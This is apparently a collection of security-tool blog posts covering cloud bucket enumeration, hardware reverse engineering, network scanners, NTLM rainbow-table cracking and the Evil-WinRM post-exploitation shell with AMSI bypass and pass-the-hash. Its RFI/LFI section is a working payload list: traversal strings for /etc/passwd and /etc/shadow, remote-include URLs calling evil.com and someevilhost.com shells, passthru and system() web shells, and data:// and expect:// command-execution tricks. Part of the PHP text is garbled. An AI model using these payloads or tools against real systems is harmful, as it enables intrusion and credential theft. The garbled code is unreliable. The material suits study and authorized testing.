  1. git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
  2. cd GCPBucketBrute/
  3. pip3 install -r requirements.txt or python3 -m pip install -r requirements.txt

Usage
First, determine the type of authentication you want to use for enumeration between a user account, service account, or unauthenticated. If you are using a service account, provide the file path to the private key via the -f/--service-account-credential-file-path argument. If you are using a user account, don't provide an authentication argument. You will then be prompted to enter the access token of your user account for accessing the GCP APIs. If you want to scan completely unauthenticated, pass the -u/--unauthenticated argument to hide authentication prompts.
  • Scan for buckets using the keyword "test" while completely unauthenticated:
python3 gcpbucketbrute.py -k test -u
  • Scan for buckets using the keyword "test" while authenticating with a service account (private key stored at ../sa-priv-key.pem), outputting results to out.txt in the current directory:
python3 gcpbucketbrute.py -k test -f ../sa-priv-key.pem -o ./out.txt
  • Scan for buckets using the keyword "test", using a user account access token, running with 10 subprocesses instead of 5:
python3 gcpbucketbrute.py -k test -s 10

Available Arguments
  • -k/--keyword
    • This argument is used to specify what keyword will be used to generate permutations with. Those permutations are what will be searched for in Google Storage.
  • --check-single
    • This argument is mutually exclusive with -k/--keyword and accepts a single string. It allows you to check your permissions on a single bucket, rather than generating a list of permutations based on a keyword. Credit: @BBerastegui
  • -s/--subprocesses
    • This argument specifies how many subprocesses will be used for bucket enumeration. The default is 5 and the higher you set this value, the faster enumeration will be, but your requests-per-second to Google will increase. These are essentially threads, but the script uses subprocesses instead of threads for parallel execution.
  • -f/--service-account-credential-file-path
  • -u/--unauthenticated
    • This argument forces unauthenticated enumeration. With this flag, you will not be prompted for credentials and valid buckets will not be checked for authenticated permissions.
  • -o/--out-file
    • This argument allows you to specify a (relative or absolute) file path to a log file to output the results to. The file will be created if it does not already exist and it will be appended to if it does already exist.



HAL - The Hardware Analyzer

$
0
0

HAL [/hel/] is a comprehensive reverse engineering and manipulation framework for gate-level netlists focusing on efficiency, extendability and portability. HAL comes with a fully-fledged plugin system, allowing to introduce arbitrary functionalities to the core.

Apart from multiple research projects, HAL is also used in our university lecture Introduction to Hardware Reverse Engineering.

Features
  • Natural directed graph representation of netlist elements and their connections
  • Support for custom gate libraries
  • High performance thanks to optimized C++ core
  • Modularity: write your own C++ Plugins for efficient netlist analysis and manipulation (e.g. via graph algorithms)
  • A feature-rich GUI allowing for visual netlist inspection and interactive analysis
  • An integrated Python shell to exploratively interact with netlist elements and to interface plugins from the GUI
  • Update v1.1.0 Support for Xilinx Unisim, Xilinx Simprim, Synopsys 90nm, GSCLIB 3.0 and UMC 0.18µm libraries is now added

API Documentation
The C++ documentation is available here. The Python documentation can be found here.

Quick Start
Install or build HAL and start the GUI via hal -g. You can list all available options via hal [--help|-h]. We included some example netlists in examples together with the implementation of the respective example gate library in plugins/example_gate_library. For instructions to create your own gate library and other useful tutorials, take a look at the wiki.
Load a library from the examples directory and start exploring the graphical representation. Use the integrated Python shell or the Python script window to interact. Both feature (limited) autocomplete functionality.
Let's list all lookup tables and print their Boolean functions:
from hal_plugins import libquine_mccluskey

qm_plugin = libquine_mccluskey.quine_mccluskey()

for gate in netlist.get_gates():
if "LUT" in gate.type:
print(gate.name + " (id "+str(gate.id) + ", type " + gate.type + ")")
print(" " + str(len(gate.input_pin_types)) + "-to-" + str(len(gate.output_pin_types)) + " LUT")
boolean_functions = qm_plugin.get_boolean_function_str(gate, False)
for pin in boolean_functions:
print(" " + pin + ": "+boolean_functions[pin])
print("")
For the example netlist fsm.vhd this prints:
FSM_sequential_STATE_REG_1_i_2_inst (id 5, type LUT6)    6-to-1 LUT    O: (~I0 I1 ~I2 I3 I4 ~I5) + (I0 ~I2 I3 I4 I5)    FSM_sequential_STATE_REG_0_i_2_inst (id 3, type LUT6)    6-to-1 LUT    O: (I2 I3 I4 ~I5) + (I1 I2) + (I0 I1) + (I1 ~I3) + (I1 ~I4) + (I1 ~I5)    FSM_sequential_STATE_REG_0_i_3_inst (id 4, type LUT6)    6-to-1 LUT    O: (~I1 ~I2 I3 ~I4 I5) + (I0 I5) + (I0 I4) + (I0 I3) + (I0 I1) + (I0 ~I2)    OUTPUT_BUF_0_inst_i_1_inst (id 18, type LUT1)    1-to-1 LUT    O: (~I0)    OUTPUT_BUF_1_inst_i_1_inst (id 20, type LUT2)    2-to-1 LUT    O: (~I0 I1) + (I0 ~I1)    FSM_sequential_STATE_REG_1_i_3_inst (id 6, type LUT6)    6-to-1 LUT    O: (I0 I2 I4) + (~I1 I2 I4) + (I0 ~I3 I4) + (~I1 ~I3 I4) + (I0 I4 ~I5) + (~I1 I4 ~I5) + (I2 I5) + (I2 I3) + (I1 I5) + (I1 I3) + (I0 I1) + (~I0 I5) + (~I0 I3) + (~I0 ~I1) + (I1 ~I2) + (~I0 ~I2) + (~I3 I5) + (~I2 ~I3) + (~I4 I5) + (I3 ~I4) + (I1 ~I4)  

Citation
If you use HAL in an academic context, please cite the framework using the reference below:
FSM_sequential_STATE_REG_1_i_2_inst (id 5, type LUT6)
6-to-1 LUT
O: (~I0 I1 ~I2 I3 I4 ~I5) + (I0 ~I2 I3 I4 I5)

FSM_sequential_STATE_REG_0_i_2_inst (id 3, type LUT6)
6-to-1 LUT
O: (I2 I3 I4 ~I5) + (I1 I2) + (I0 I1) + (I1 ~I3) + (I1 ~I4) + (I1 ~I5)

FSM_sequential_STATE_REG_0_i_3_inst (id 4, type LUT6)
6-to-1 LUT
O: (~I1 ~I2 I3 ~I4 I5) + (I0 I5) + (I0 I4) + (I0 I3) + (I0 I1) + (I0 ~I2)

OUTPUT_BUF_0_inst_i_1_inst (id 18, type LUT1)
1-to-1 LUT
O: (~I0)

OUTPUT_BUF_1_inst_i_1_inst (id 20, type LUT2)
2-to-1 LUT
O: (~I0 I1) + (I0 ~I1)

FSM_sequential_STATE_REG_1_i_3_inst (id 6, type LUT6)
6-to-1 LUT
O: (I0 I2 I4) + (~I1 I2 I4) + (I0 ~I3 I4) + (~I1 ~I3 I4) + (I0 I4 ~I5) + (~I1 I4 ~I5) + (I2 I5) + (I2 I3) + (I1 I5) + (I1 I3) + (I0 I1) + (~I0 I5) + (~I0 I3) + (~I0 ~I1) + (I1 ~I2) + (~I0 ~I2) + (~I3 I5) + (~I2 ~I3) + (~I4 I5) + (I3 ~I4) + (I1 ~I4)
</ div>
Feel free to also include the original paper
@misc{hal,
author = {{EmSec Chair for Embedded Security}},
publisher = {{Ruhr University Bochum}},
title = {{HAL - The Hardware Analyzer}},
year = {2019},
howpublished = {\url{https://github.com/emsec/hal}},
}

Install Instructions

Ubuntu
HAL releases are available via it's own ppa. You can find it here: ppa:sebastian-wallat/hal

macOS
Use the following commands to install hal via homebrew.
@article{2018:Fyrbiak:HAL,
author = {Marc Fyrbiak and
Sebastian Wallat and
Pawel Swierczynski and
Max Hoffmann and
Sebastian Hoppach and
Matthias Wilhelm and
Tobias Weidlich and
Russell Tessier and
Christof Paar},
title = {{HAL-} The Missing Piece of the Puzzle for Hardware Reverse Engineering,
Trojan Detection and Insertion},
journal = {IEEE Transactions on Dependable and Secure Computing},
year = {2018},
publisher = {IEEE},
howpublished = {\url{https://github.com/emsec/hal}}
}

Build Instructions
Run the following commands to download and install HAL.
  1. git clone https://github.com/emsec/hal.git && cd hal
  2. To install all neccessary dependencies execute ./install_dependencies.sh
  3. mkdir build && cd build
  4. cmake ..
  5. make
Optionally you can install HAL:
make install

Build on macOS
Please make sure to use a compiler that supports OpenMP. You can install one from e.g. Homebrew via: brew install llvm.
To let cmake know of the custom compiler use following command.
cmake .. -DCMAKE_C_COMPILER=/usr/local/opt/llvm/bin/clang -DCMAKE_CXX_COMPILER=/usr/local/opt/llvm/bin/clang++

Disclaimer
HAL is at most alpha-quality software. Use at your own risk. We do not encourage any malicious use of our toolkit.


Cacti - Complete Network Graphing Solution

$
0
0

IMPORTANT
When using source or by downloading the code directly from the repository, it is important to run the database upgrade script if you experience any errors referring to missing tables or columns in the database.
Changes to the database are committed to the cacti.sql file which is used for new installations and committed to the installer database upgrade for existing installations. Because the version number does not change until release in the develop branch, which will result in the database upgrade not running, it is important to either use the database upgrade script to force the current version or update the version in the database.

Running Database Upgrade Script
sudo -u cacti php -q cli/upgrade_database.php --forcever=`cat include/cacti_version`

Updating Cacti Version in Database
update version set cacti = '1.1.38';
Note: Change the above version to the correct version or risk the installer upgrading from a previous version.

About
Cacti is a complete network graphing solution designed to harness the power of RRDtool's data storage and graphing functionality providing the following features:
  • Remote and local data collectors
  • Device discovery
  • Automation of device and graph creation
  • Graph and device templating
  • Custom data collection methods
  • User, group and domain access controls
All of this is wrapped in an intuitive, easy to use interface that makes sense for both LAN-sized installations and complex networks with thousands of devices.
Developed in the early 2000s by Ian Berry as a high school project, it has been used by thousands of companies and enthusiasts to monitor and manage their Enterprise Networks and Data Centers.

Requirements
Cacti should be able to run on any Linux, UNIX, or Windows based operating system with the following requirements:
  • PHP 5.4+
  • MySQL 5.1+
  • RRDtool 1.3+, 1.5+ recommended
  • NET-SNMP 5.5+
  • Web Server with PHP support
PHP Must also be compiled as a standalone cgi or cli binary. This is required for data gathering via cron.

php-snmp
We mark the php-snmp module as optional. So long as you are not using ipv6 devices, or using snmpv3 engine IDs or contexts, then using php-snmp should be safe. Otherwise, you should consider uninstalling the php-snmp module as it will create problems. We are aware of the problem with php-snmp and looking to get involved in the php project to resolve these issues.

RRDtool
RRDtool is available in multiple versions and a majority of them are supported by Cacti. Please remember to confirm your Cacti settings for the RRDtool version if you having problem rendering graphs.

Documentation
Documentation is available with the Cacti releases and also available for viewing on the Documentation Repository.

Contribute
Check out the main Cacti web site for downloads, change logs, release notes and more!

Community forums
Given the large scope of Cacti, the forums tend to generate a respectable amount of traffic. Doing your part in answering basic questions goes a long way since we cannot be everywhere at once. Contribute to the Cacti community by participating on the Cacti Community Forums.

GitHub Documentation
Get involved in creating and editing Cacti Documentation! Fork, change and submit a pull request to help improve the documentation on GitHub.

GitHub Development
Get involved in development of Cacti! Join the developers and community on GitHub!

Functionality

Data Sources
Cacti handles the gathering of data through the concept of data sources. Data sources utilize input methods to gather data from devices, hosts, databases, scripts, etc... The possibilities are endless as to the nature of the data you are able to collect. Data sources are the direct link to the underlying RRD files; how data is stored within RRD files and how data is retrieved from RRD files.

Graphs
Graphs, the heart and soul of Cacti, are created by RRDtool using the defined data sources definition.

Templating
Bringing it all together, Cacti uses and extensive template system that allows for the creation and consumption of portable templates. Graph, data source, and RRA templates allow for the easy creation of graphs and data sources out of the box. Along with the Cacti community support, templates have become the standard way to support graphing any number of devices in use in today computing and networking environments.

Data Collection (The Poller)
Local and remote data collection support with the ability to set collection intervals. Check out Data Source Profile with in Cacti for more information. Data Source Profiles can be applied to graphs at creation time or at the data template level.
Remote data collection has been made easy through replication of resources to remote data collectors. Even when connectivity to the main Cacti installation is lost from remote data collector, it will store collected data until connectivity is restored. Remote data collection only requires MySQL and HTTP/HTTPS access back to the main Cacti installation location.

Network Discovery and Automation
Cacti provides administrators a series of network automation functionality in order to reduce the time and effort it takes to setup and manage devices.
  • Multiple definable network discovery rules
  • Automation templates that specify how devices are configured

Plugin Framework
Cacti is more than a network monitoring system, it is an operations framework that allows the extension and augmentation of Cacti functionality. The Cacti Group continues to maintain an assortment of plugins. If you are looking to add features to Cacti, there is quite a bit of reference material to choose from on GitHub.

Dynamic Graph Viewing Experience
Cacti allows for many runtime augmentations while viewing graphs:
  • Dynamically loaded tree and graph view
  • Searching by string, graph and template types
  • Viewing augmentation
  • Simple time span adjustments
  • Convenient sliding time window buttons
  • Single click realtime graph option
  • Easy graph export to csv
  • RRA view with just a click

User, Groups and Permissions
Support for per user and per group permissions at a per realm (area of Cacti), per graph, per graph tree, per device, etc... The permission model in Cacti is role based access control (RBAC) to allow for flexible assignment of permissions. Support for enforcement of password complexity, password age and changing of expired passwords.

RRDtool Graph Options
Cacti supports most RRDtool graphing abilities including:

Graph Options
  • Full right axis
  • Shift
  • Dash and dash offset
  • Alt y-grid
  • No grid fit
  • Units length
  • Tab width
  • Dynamic labels
  • Rules legend
  • Legend position

Graph Items
  • VDEFs
  • Stacked lines
  • User definable line widths
  • Text alignment


Rsdl - Subdomain Scan With Ping Method

$
0
0

Subdomain Scan With Ping Method.

FlagsValueDescription
--hostnameexample.comDomain for scan.
--outputRecords the output with the domain name.
--list/tmp/lists/example.txtLister for subdomains.


Installation

  • go get github.com/tismayil/rsdl
  • clone repo and build ( go build rsdl.go )


Used Repos.

  • GO Spinner : github.com/briandowns/spinner - [ go get github.com/briandowns/spinner ]
  • GO Ping : github.com/sparrc/go-ping - [ go get github.com/sparrc/go-ping ]



NetAss2 - Network Assessment Assistance Framework

$
0
0

Easier network scanning with NetAss2 (Network Assessment Assistance Framework).

Make it easy for Pentester to do penetration testing on network.

Dependencies
  • nmap (tool)
  • zmap (tool)

Installation
git clone https://github.com/zerobyte-id/NetAss2.git
cd NetAss2
sudo chmod +x install.bash
sudo ./install.bash

Run
netass2

Existing Menu
- HOST DISCOVERY
- PORT SCAN ON SINGLE HOST
- MASSIVE PORT SCAN VIA DISCOVERED HOSTS
- MASSIVE PORT SCAN VIA LIST ON FILE
- SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
- MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
- SHOW REPORTS

Screenshot (Documentation)




Asset Discover - Burp Suite Extension To Discover Assets From HTTP Response

$
0
0

Burp Suite extension to discover assets from HTTP response using passive scanning. Refer our blog Asset Discovery using Burp Suite for more details.
The extension is now part of the BApp store and can be installed directly from the Burp Suite. https://portswigger.net/bappstore/d927f0065171485981d6eb49a860fc3e

Description
Passively parses HTTP response of the URLs in scope and identifies different type assets such as domain, subdomain, IP, S3 bucket etc. and lists them as informational issues.

Setup
  • Setup the python environment by providing the jython.jar file in the 'Options' tab under 'Extender' in Burp Suite.
  • Download the extension.
  • In the 'Extensions' tab under 'Extender', select 'Add'.
  • Change the extension type to 'Python'.
  • Provide the path of the file ‘Asset_Discover.py’ and click on 'Next'.



Usage
  • Add a URL to the 'Scope' under the 'Target' tab. The extension will start identifying assets through passive scan.



Requirements

Code Credits
A large portion of the base code has been taken from the following sources:


Brave Browser - Next Generation Secure, Fast And Private Web Browser with Adblocker

$
0
0

The Brave Privacy Browser is your fast, safe private web browser with ad blocker, private tabs and pop-up blocker. Browse without being tracked by advertisers, malware and pop-ups. 

Fast & Secure Web Browser
No external plugins or settings! Brave privacy browser simply provides the most secure, lightning fast web browser for Android. Enjoy browsing without popups (pop up blocker), ads, malware and other annoyances.

AdBlock Web Browser
The Brave Privacy Browser App is designed with a built-in AdBlocker (pop up blocker). Brave's free adBlocker protects you from ads which track you as you browse the web, securing your privacy.

Automatic Privacy - AdBlock Browser Protection
The Brave Privacy Browser App also protects you with leading privacy and security features such as HTTPS Everywhere (encrypted data traffic), script blocking, 3rd party cookie blocking and incognito private tabs.

App Features
  • Private browser
  • Free built-in AdBlocker
  • Pop up blocker (blocks ads)
  • Safe private browsing
  • Invasive Ad free web browser
  • Sync Bookmarks securely
  • Free tracking protection web browser
  • Https Everywhere (for security)
  • Script Blocker
  • 3rd party cookie blocker
  • Private bookmarks
  • Browsing history
  • Recent and private tabs
  • Fast, free, private search engine

Brave Rewards
With your old browser, you paid to browse the web by viewing ads. Now, Brave welcomes you to the new Internet. One where your time is valued, your personal data is kept private, and you actually get paid for your attention.

About Brave
Our mission is to save the web by making a safe, private and fast browser while growing ad revenue for content creators. Brave aims to transform the online ad ecosystem with micropayments and a new revenue-sharing solution to give users and publishers a better deal, where safe, fast browsing is the path to a brighter future for an open web.



Rainbow Crackalack - Rainbow Table Generation And Lookup Tools

$
0
0

This project produces open-source code to generate rainbow tables as well as use them to look up password hashes. While the current release only supports NTLM, future releases aim to support MD5, SHA-1, SHA-256, and possibly more. Both Linux and Windows are supported!
For more information, see the project website: https://www.rainbowcrackalack.com/

Volunteering
The project for generating NTLM 9-character tables is now underway! If you create 5 tables for us, your name will be listed on the project website as a project supporter. If you create 200 tables, we will mail you a free magnetic hard drive containing NTLM 9-character tables with 50% efficiency. Ships world-wide!
If you have modern GPU equipment and you'd like to contribute, please reach out using this form to coordinate efforts.

NTLM Tables
Currently, NTLM 8-character tables are available for free download via Bittorrent. For convenience, they may also be purchased on an SSD with a USB 3.0 external enclosure.

Examples

Generating NTLM 9-character tables
The following command shows how to generate a standard 9-character NTLM table:
# ./crackalack_gen ntlm ascii-32-95 9 9 0 803000 67108864 0
The arguments are designed to be comparable to those of the original (and now closed-source) rainbow crack tools. In order, they mean:
ArgumentMeaning
ntlmThe hash algorithm to use. Currently only "ntlm" is supported.
ascii-32-95The character set to use. This effectively means "all available characters on the US keyboard".
9The minimum plaintext character length.
9The maximum plaintext character length.
0The reduction index. Not used under standard conditions.
803000The chain length for a single rainbow chain.
67108864The number of chains per table (= 64M)
0The table part index. Keep all other args the same, and increment this field to generate a single set of tables.

Table lookups against NTLM 8-character hashes
The following command shows how to look up a file of NTLM hashes (one per line) against the NTLM 8-character tables:
# ./crackalack_lookup /export/ntlm8_tables/ /home/user/hashes.txt

Recommended Hardware
The NVIDIA GTX & RTX lines of GPU hardware has been well-tested with the Rainbow Crackalack software, and offer an excellent price/performance ratio. Specifically, the GTX 1660 Ti or RTX 2060 are the best choices for building a new cracking machine. This document contains the raw data that backs this recommendation.
However, other modern equipment can work just fine, so you don't necessarily need to purchase something new. The NVIDIA GTX and AMD Vega product lines are still quite useful for cracking!

Change Log
  • v1.0: June 11, 2019: Initial revision.
  • v1.1: August 8, 2019: massive speed improvements (credit Steve Thomas), finalization of NTLM9 spec, bugfixes.

Windows Build
A 64-bit Windows build can be achieved on an Ubuntu host machine by installing the following prerequisites:
# apt install mingw-w64 opencl-headers
Then starting the build with:
# make clean; ./make_windows.sh

Author: Joe Testa (@therealjoetesta)



Evil-Winrm v1.9 - The Ultimate WinRM Shell For Hacking/Pentesting

$
0
0

This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features
  • Load in memory Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) assemblies bypassing some AVs
  • Load x64 payloads generated with awesome donut technique
  • AMSI Bypass
  • Pass-the-hash support
  • Kerberos auth support
  • SSL and certificates support
  • Upload and download files
  • List remote machine services without privileges
  • Command History
  • WinRM command completion
  • Local files completion
  • Colorization on output messages (can be disabled optionally)

Help
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname (required)
-U, --url URL Remote url endpoint (default wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash NTHash NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-h, --help Display this help message

Requirements
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1. Depending of your installation method (3 availables) the installation of them could be required to be done manually.

Installation & Quick Start (3 methods)

Method 1. Installation directly as ruby gem (dependencies will be installed automatically on your system)
  • Step 1. Install it (it will install automatically dependencies): gem install evil-winrm
  • Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 2. Git clone and install dependencies on your system manually
  • Step 1. Install dependencies manually: ~$ sudo gem install winrm winrm-fs colorize stringio
  • Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
  • Step 3. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Method 3. Using bundler (dependencies will not be installed on your system, just to use evil-winrm)
  • Step 1. Install bundler: gem install bundler:2.0.2
  • Step 2. Install dependencies with bundler: cd evil-winrm && bundle install --path vendor/bundle
  • Step 3. Launch it with bundler: bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

Documentation

Clear text password
If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.

Ipv6
To use IPv6, the address must be added to /etc/hosts. Just put the already set name of the host after -i argument instead of an IP address.

Basic commands
  • upload: local files can be auto-completed using tab key.
    • usage: upload local_filename or upload local_filename destination_filename
  • download:
    • usage: download remote_filename or download remote_filename destination_filename
Note about paths (upload/download): Relative paths are not allowed to use on download/upload. Use filenames on current directory or absolute path.
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary, l04d3r-LoadDll, Donut-Loader and Bypass-4MSI functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts
  • To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions. Very large files can take a long time to be loaded.

Advanced commands
  • Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.

  • l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))
    The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.


  •  Donut-Loader: allows to inject x64 payloads generated with awesome donut technique. No need to encode the payload.bin, just generate and inject!
  • You can use this donut-maker to generate the payload.bin if you don't use Windows. This script use a python module written by Marcello Salvati (byt3bl33d3r). It could be installed using pip:
  • pip3 install donut-shellcode

  • Bypass-4MSI: patchs AMSI protection.

Kerberos
  • First you have to sync date with the DC: rdate -n <dc_ip>
  • To generate ticket there are many ways:
    • Using ticketer.py from impacket:
      ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
    • If you get a kirbi ticket using Rubeus or Mimikatz you have to convert to ccache using ticket_converter.py:
      python ticket_converter.py ticket.kirbi ticket.ccache
  • Add ccache ticket. There are 2 ways:
    export KRB5CCNAME=/foo/var/ticket.ccache
    cp ticket.ccache /tmp/krb5cc_0
  • Add realm to /etc/krb5.conf (for linux). Use of this format is important:
     CONTOSO.COM = {
    kdc = fooserver.contoso.con
    }
  • Check Kerberos tickets with klist
  • To remove ticket use: kdestroy
  • For more information about Kerberos check this cheatsheet

Extra features
  • To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false

Credits:
Main author:
Collaborators, developers, documenters, testers and supporters:
Hat tip to:
  • Alamot for his original code.
  • 3v4Si0N for his awesome dll loader.
  • WinRb All contributors of ruby library.
  • TheWover for his awesome donut tool.
  • byt3bl33d3r for his python library to create donut payloads.
  • Sh11td0wn for inspiration about new features.


RFI/LFI Payload List

$
0
0

As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. I’ll give code examples in PHP format.

Let’s look at some of the code that makes RFI / LFI exploits possible.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big “NO”. Always remove any input passing through the browser. When the user clicks on “File” to visit “files.php” when he visits the web page, something like this will appear.
http: //localhost/index.php? page = files.php
Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.
Viewing files on the server is a “Local File Inclusion” or LFI exploit. This is no worse than an RFI exploit.
http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now let’s look at the RFI aspect of this exploit. Let’s get some of the codes we’ve taken before.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
Now suppose we write something like …
http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Let’s look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named “test.php” and put the following code in it and save it.

<? Php
passthru ($ _ GET [cmd]);
?>
Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it “out of service for security reasons”. With this code in test.php, we can send a request to the web page, including file inclusion exploit.
http: //localhost/index.php? page = http: //someevilhost.com/test.php
When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.
http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd
This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>
There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here I’ve prepared something easy and quick about this course for you.
<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>
Now I hope you can see what’s going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!

Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI to RCE via /proc/*/fd :
  1. Upload a lot of shells (for example : 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)

LFI to RCE via Upload :
http://example.com/index.php?page=path/to/uploaded/file.png

References :
Testing for Local File Inclusion
Wikipedia
Remote File Inclusion
Wikipedia: "Remote File Inclusion"
PHP File Inclusion


Jaeles - The Swiss Army Knife For Automated Web Application Testing

$
0
0

Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.

Installation
go get -u github.com/jaeles-project/jaeles
Please visit the Official Documention for more details.
Checkout Signature Repo for base signature.

Usage
More usage here
Example commands.
jaeles scan -u http://example.com

jaeles scan -s signatures/common/phpdebug.yaml -U /tmp/list_of_urls.txt

jaeles scan --retry 3 --verbose -s "signatures/cves/jira-*" -U /tmp/list_of_urls.txt

jaeles --verbose server -s sqli

Showcases
More showcase here
Detect Jira SSRF CVE-2019-8451

Contribute
If you have some new idea about this project, issue, feedback or found some valuable tool feel free to open an issue for just DM me via @j3ssiejjj.

Credits


Vulnx v1.9 - An Intelligent Bot Auto Shell Injector That Detect Vulnerabilities In Multiple Types Of CMS (Wordpress, Joomla, Drupal, Prestashop...)

$
0
0

